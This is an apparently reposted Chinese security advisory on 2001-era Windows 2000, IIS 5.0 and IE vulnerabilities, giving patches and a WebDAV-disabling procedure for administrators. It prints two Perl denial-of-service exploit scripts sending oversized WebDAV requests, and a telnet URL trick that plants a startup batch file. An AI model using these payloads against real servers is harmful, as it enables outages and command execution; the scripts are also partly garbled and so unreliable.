分享
 
 
 

Win2K典型漏洞及对策

王朝system·作者佚名  2008-05-19
窄屏简体版  字體: |||超大  

??Windows2000操作系统现在已经广泛应用于企业内部网和外部网,虽然它的Bug不断,但是只要及时跟踪和了解相关漏洞及对策,并正确安装微软公司发布的安全补丁程序,是绝对可以充分利用Windows2000的强大功能的。本文将描述Win2K系统的典型漏洞及对策,系统管理员应该仔细阅读,以最大程度地确保系统之稳固。

漏洞名称:

Microsoft IIS 5.0 WebDAV搜索之拒绝服务漏洞

发布日:

2001年3月16日

本地或远程:

远程

描 述:

WebDAV即Web分布式创作和版本控制协议,它是一个基于HTTP的新协议,用户可以通过WebDAV在网络上进行与所用创作工具无关的无缝文档合作,例如通过Web进行基本的远程文件操作:复制、移动、删除等。Exchange 2000的WebDAV支持使Microsoft Office 2000文档可直接存放在Exchange中,因而简化了被复制文档的管理和团队式创作。WebDAV将XML用作数据元的传输格式。

WebDAV 在对超长请求的处理中包含一个缺陷,当提交一个有效然而超长的WebDAV搜索请求时,有可能会重新启动IIS 服务并导致服务器停止响应。

漏洞利用方式:

这个漏洞的利用脚本是perl代码,如下:

http://downloads.securityfocus.com/vulnerabilities/exploits/vv6.pl

#!/usr/bin/perl

use IO::Socket;

printf "IIS 5.0 SEARCH\nWritten by Georgi Guninski wait some time\n";

if(@ARGV

$port = @ARGV[1];

$host = @ARGV[0];

sub vv()

{

$ll=$_[0]; #length of buffer

$ch=$_[1];

$socket = IO::Socket::INET-new(PeerAddr = $host,PeerPort = $port,Proto = "TCP") || return;

$over=$ch x $ll; #string to overflow

$xml='SELECT DAV:displayname from

SCOPE("'.$over.'")'."\n";

$l=length($xml);

$req="SEARCH / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";

syswrite($socket,$req,length($req));

print ".";

$socket-read($res,3000);

print "r=".$res;

close $socket;

}

do vv(126000,"V");

sleep(1);

do vv(126000,"V");

#Try 125000 - 128000

对 策:

Microsoft补丁程序Q291845_W2K_SP2_x86_en

http://download.microsoft.com/download/win2000platform/Patch/

q291845/NT5/EN-US/Q291845_W2K_SP2_x86_en.EXE

漏洞名称:

Microsoft IE 5.01/ 5.5 Telnet客户文件覆盖漏洞

发布日:

2001年3月9日

本地或远程:

远程

描 述:

Win2K的Unix2.0服务中包含了一个客户端日志选项,用以将一个telnet会话中的所有交换信息都记录下来。这里面存在一个漏洞,使远程用户可以调用telnet 客户程序并通过IE在一个目标机器上执行任意命令。实际上,这是通过伪造一个由命令行参数组成的URL并成为telent的输入项,从而调用telnet.exe连接到主机并记录会话信息。如果攻击者能够使用这个文件的话,他就可以向其中写入任意命令,以备今后执行。

漏洞利用方式:

下面的URL 会导致IE连接到主机并开始记录功能:

telnet:-f%20\file.txt%20host

请看下面的一个恶意HTML代码的例子,它将主机host的目标端口上接收到的数据写入所有用户启动目录下的文件filename中。如果登录的用户有适当的权限,就会创建一个批处理文件,以备今后鉴定用户身份时执行。

start%20menu\programs\startup\start.bat%20host%208000

对 策:

Microsoft已经发布了纠正这一问题的补丁,地址是:

http://www.microsoft.com/windows/ie/download/critical/q286043/default.asp

漏洞名称:

Microsoft IIS 5.0 WebDAV拒绝服务漏洞

发布日:

2001 年3月8日

本地或远程:

远程

描 述:

WebDAV在对某些畸形请求的处理中包含一个漏洞,提交多个畸形的WebDAV 请求可能会造成服务器停止响应,并有可能重新启动所有的IIS服务。

漏洞利用方式:

这个漏洞的利用脚本是perl代码,如下:

http://www.securityfocus.com/data/vulnerabilities/exploits/vv5.pl

#!/usr/bin/perl

# Written by Georgi Guninski

use IO::Socket;

print "IIS 5.0 propfind\n";

$port = @ARGV[1];

$host = @ARGV[0];

sub vv()

{

$ll=$_[0]; #length of buffer

$ch=$_[1];

$over=$ch x $ll; #string to overflow

$socket = IO::Socket::INET-new(PeerAddr = $host,PeerPort = $port,Proto = "TCP") || return;

#$xml=''."".''."\n\n";

# ^^^^ This is another issue and also works with length ~65000

$xml=''."".''."\n\n";

$l=length($xml);

$req="PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";

syswrite($socket,$req,length($req));

print ".";

$socket-read($res,300);

#print "r=".$res;

close $socket;

}

do vv(128008,"V"); # may need to change the length

sleep(1);

do vv(128008,"V");

print "Done.\n";

对 策:

方法1:安装Microsoft补丁程序Q291845_W2K_SP2_x86_en

http://download.microsoft.com/download/win2000platform/Patch/

q291845/NT5/EN-US/Q291845_W2K_SP2_x86_en.EXE

方法2:禁止WebDAV功能

默认状态下,IIS5.0能够对WebDAV请求做出响应,因此,如果没有Web创作和发布的需求,最好最简单的方法就是禁止WebDAV。IIS5.0的 WebDAV功能是通过Httpext.dll文件实现的,不能通过重命名方式执行禁止,因为Win2K的Windows文件保护(WFP)功能会阻止对某些系统文件尽显修改或删除。正确禁止WebDAV功能的步骤是:

1、切换到命令行状态

2、执行“IISRESET /STOP”,停止IIS服务

3、转换到目录“%SystemRoot%\System32\Inetsrv”,执行“CACLS httpext.dll /D Everyone”,设置Httpext.dll文件的ACL,使任何人都不能访问它

4、执行“IISRESET /START”,重新启动IIS服务

漏洞名称:

Microsoft IIS 多个无效URL请求拒绝服务漏洞

发布日:

2001 年3月1日

本地或远程:

本地、远程

描 述:

向一个正在运行Microsoft IIS 的主机多次发出一个特别伪造的URL请求,就会导致IIS 服务停止响应。恢复正常功能只能重新启动服务。

漏洞利用方式:

目前还没有对它的利用

对 策:

Microsoft补丁程序Q286818_W2K_SP3_x86_en

http://download.microsoft.com/download/win2000platform/Patch/

q286818/NT5/EN-US/Q286818_W2K_SP3_x86_en.EXE

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有